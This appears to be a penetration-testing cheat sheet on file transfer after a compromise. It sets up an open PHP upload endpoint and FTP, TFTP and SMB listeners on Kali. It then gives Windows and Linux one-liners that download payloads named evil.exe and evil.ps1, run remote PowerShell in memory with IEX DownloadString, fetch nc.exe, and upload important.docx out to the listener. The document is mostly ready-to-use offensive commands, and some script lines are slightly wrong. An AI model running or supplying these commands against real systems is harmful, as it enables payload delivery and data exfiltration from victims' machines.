Include scipts, commands to quickly transfer files to and from a remote server.
Server
In the beginning, create a listener to receive files from a remote client. Depending on the firewall configuration, we provide two options for setting up the server, which are installing an HTTP server and an FTP server.
PHP webserver
Typically, when using Kali Linux, the system often comes with Apache or Nginx pre-installed. You can start the service and make necessary modifications to files in the /var/www/html directory.
Create /var/www/html/upload.php
1
2
3
4
5
6
| // upload.php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
|
Create uploads folder in /var/www/html/
1
2
| sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
|
At this point, your PHP server is set up, and you just need to use an HTTP POST request to the /upload.php endpoint with the file contained in the file parameter.
FTP server
Install Pure-FTPd:
1
| sudo apt update && sudo apt install pure-ftpd
|
Create FTP user, home folder:
1
2
3
4
5
6
7
8
9
10
11
| #!/bin/bash
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd ftp -u ftpuser -d /home/ftp
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /home/ftp
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd
|
SMB Server
Impacket is a collection of Python classes for working with network protocols. We use the smbserver module to listen a SMB server
For simple systems that don’t require SMBv2, you can set up an SMBv1 server with the following command:
1
| python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
|
For machines that require SMBv2, you can use the smb2support parameter, and you’ll need to provide a username and password as well. Here’s an example command:
1
| python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username kali -password kali kali .
|
Windows client
This section is for Windows machines that want to send files to the listening server or download file from then listening server:
HTTP
Download
1
| powershell (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/evil.exe', 'evil.exe')
|
1
| powershell Invoke-WebRequest -Uri http://10.11.0.4/evil.exe -OutFile evil.exe
|
Run a PowerShell script from remote file without saving
1
| powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/evil.ps1')
|
Execute an Invoke powershell in CMD
Call the funtion right in the file
1
2
3
4
5
| function Invoke-MS16032 {
...
}
Invoke-MS16032 "IEX ..."
|
Upload
1
| powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
|
FTP
Use FTP command (use SEND/GET command to transfer files):
1
2
3
4
5
6
| open 10.11.0.4 21
USER ftp
ftp
bin
GET nc.exe
bye
|
Interactive shell:
1
2
3
4
5
6
| echo open 10.11.0.4 21 > ftp.txt
echo USER ftp >> ftp.txt
echo lab >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye
|
Run ftp with file:
TFTP
1
| tftp -i 10.11.0.4 put important.docx
|
SMB
Authentication:
1
| net use \\10.10.10.10 /USER:kali kali
|
Download
1
| copy \\10.10.10.10\kali\important.docx c:\important.docx
|
Upload
1
| copy c:\important.docx \\10.10.10.10\kali
|
Linux Client
This section is for Linux machines that want to send files to the listening server or download file from then listening server:
HTTP
Download
1
| wget http://10.0.0.4/evil -O evil
|
1
| curl http://10.0.0.4/evil -o evil
|
Upload
1
| curl -i -X POST -F 'file=@evil.exe' http://10.0.0.4/upload.php
|
FTP
Use FTP client
1
| ftp username:password@ftpserver
|
1
2
| PUT evil.elf
GET evil.elf
|
Use wget
1
| wget ftp://username:password@ftpserver/evil.elf
|
